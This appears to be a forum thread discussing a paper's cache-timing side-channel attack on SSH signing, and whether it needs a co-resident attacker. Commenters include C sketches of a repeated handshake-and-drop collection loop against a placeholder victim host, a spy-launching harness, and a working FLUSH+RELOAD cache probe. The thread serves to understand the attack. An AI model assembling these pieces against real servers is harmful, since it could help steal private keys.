From section 5.2, Attacking SSH (emphasis mine):

"...our client saves the hash of the concatenated string and the digital signature raw bytes sent from the server. All subsequent messages, including SSH_MSG_NEWKEYS and any client responses, are not required by our attack. Our client therefore drops the connection at this stage, and repeats this process several hundred times to build up a set of distinct trace, digital signature, and digest tuples. See Section 6 for our explicit attack parameters. Figure 3 is a typical signal extracted by our spy program in parallel to the handshake between our client and the victim SSH server."

This inclines me to believe that the attack can be executed remotely, by repeatedly connecting to a vulnerable SSH server, rather than requiring a local process on the server.
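
For illustration, the collection loop the paper describes would look roughly like this (a minimal sketch using libssh; libssh verifies the server signature internally and doesn't expose the raw bytes, so the paper's custom client presumably records them from its own key-exchange code -- the point here is just the repeated handshake-and-drop structure, and the hostname is a placeholder):

    #include <libssh/libssh.h>

    /* Sketch: complete the key exchange (which is when the server's
     * signature arrives), then drop the connection and repeat.
     * Hundreds of iterations build the set of (trace, signature,
     * digest) tuples described in section 5.2. */
    int main(void)
    {
        int port = 22;
        for (int i = 0; i < 400; i++) {      /* "several hundred times" */
            ssh_session s = ssh_new();
            if (s == NULL) return 1;
            ssh_options_set(s, SSH_OPTIONS_HOST, "victim.example.org");
            ssh_options_set(s, SSH_OPTIONS_PORT, &port);
            if (ssh_connect(s) == SSH_OK) {
                /* key exchange done: the exchange-hash digest and the
                 * server's signature would be recorded at this point */
                ssh_disconnect(s);
            }
            ssh_free(s);
        }
        return 0;
    }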




This is the only point where I wish the paper were clearer...

"Similar to Section 5.1, we wrote a custom SSH client that launches our spy program, the spy program collects the timing signals during the handshake. At the same time it performs an SSH handshake where the protocol messages and the digital signature are collected for our attack."

I think the 'spy program' must be local to observe the low-level cache timings they use for the attack, but I haven't found anywhere that they come out and say that explicitly.
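
The "launches our spy program" phrasing does suggest the client and spy are co-located with the victim. As a hedged sketch of what that launch step might look like (the ./spy path and the handshake placeholder are mine, not from the paper):

    #include <signal.h>
    #include <sys/wait.h>
    #include <unistd.h>

    /* Hypothetical sketch: start the (local) spy just before the
     * handshake so its cache-probe trace overlaps the server's
     * signing operation, then stop it. */
    int main(void)
    {
        pid_t spy = fork();
        if (spy == 0) {
            execl("./spy", "spy", (char *)NULL); /* hypothetical spy binary */
            _exit(127);
        }
        /* ... perform the SSH handshake here (placeholder) ... */
        kill(spy, SIGTERM);
        waitpid(spy, NULL, 0);
        return 0;
    }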


Exactly. The paper is frustratingly unclear on what the exploit scenario is.

"...we wrote a custom SSH client that launches our spy program, the spy program collects the timing signals during the handshake..."

I have a bad feeling that this means an attacker with a custom client can extract private key information over the network by repeatedly establishing connections with a vulnerable server.


I believe they're talking about a test harness they built to synchronize collection of cache traces with the execution of the handshake. FLUSH+RELOAD requires a co-resident attacker (they need to be on the same hardware, though not necessarily in the same VM).
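
For anyone unfamiliar, the core FLUSH+RELOAD primitive is just this (a minimal x86 sketch; the hit/miss cycle threshold is machine-specific):

    #include <stdint.h>
    #include <x86intrin.h>   /* _mm_clflush, __rdtscp, _mm_mfence */

    /* Time a load of one shared cache line, then flush it again.
     * A fast reload means the victim touched that line (i.e. executed
     * that code) since our last flush -- which only works when attacker
     * and victim share the physical cache, hence co-residency. */
    static uint64_t probe(const volatile uint8_t *addr)
    {
        unsigned aux;
        _mm_mfence();
        uint64_t start = __rdtscp(&aux);
        (void)*addr;                          /* reload */
        uint64_t cycles = __rdtscp(&aux) - start;
        _mm_clflush((const void *)addr);      /* flush for the next round */
        return cycles;                        /* small value => cache hit */
    }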


Random network delays would probably swamp any meaningful timing signal over a remote connection, which is presumably why they used a local process.


One might expect that to be the case, but it may not hold: random jitter averages out, so given a large enough sample size a small systematic timing difference can still be recovered.
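
A toy simulation makes the point (the numbers are made up, not from the paper): the noise on a sample mean shrinks as 1/sqrt(n), so a small systematic difference survives jitter orders of magnitude larger.

    #include <math.h>
    #include <stdio.h>
    #include <stdlib.h>

    /* Toy model: a 50-cycle secret-dependent difference buried in
     * jitter with stddev 50000 cycles. Enough samples expose it. */
    static double gauss(void)   /* crude Box-Muller */
    {
        double u1 = (rand() + 1.0) / ((double)RAND_MAX + 2.0);
        double u2 = (rand() + 1.0) / ((double)RAND_MAX + 2.0);
        return sqrt(-2.0 * log(u1)) * cos(2.0 * 3.141592653589793 * u2);
    }

    int main(void)
    {
        const double signal = 50.0, jitter = 50000.0;
        for (long n = 1000; n <= 10000000; n *= 10) {
            double sum = 0.0;
            for (long i = 0; i < n; i++)
                sum += signal + jitter * gauss();
            printf("n=%8ld  mean=%9.1f  expected noise ~%.1f\n",
                   n, sum / n, jitter / sqrt((double)n));
        }
        return 0;
    }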


Found further discussion here: http://seclists.org/oss-sec/2016/q2/514


One would presumably not be seeding keys with data pulled from network delays. Too predictable.



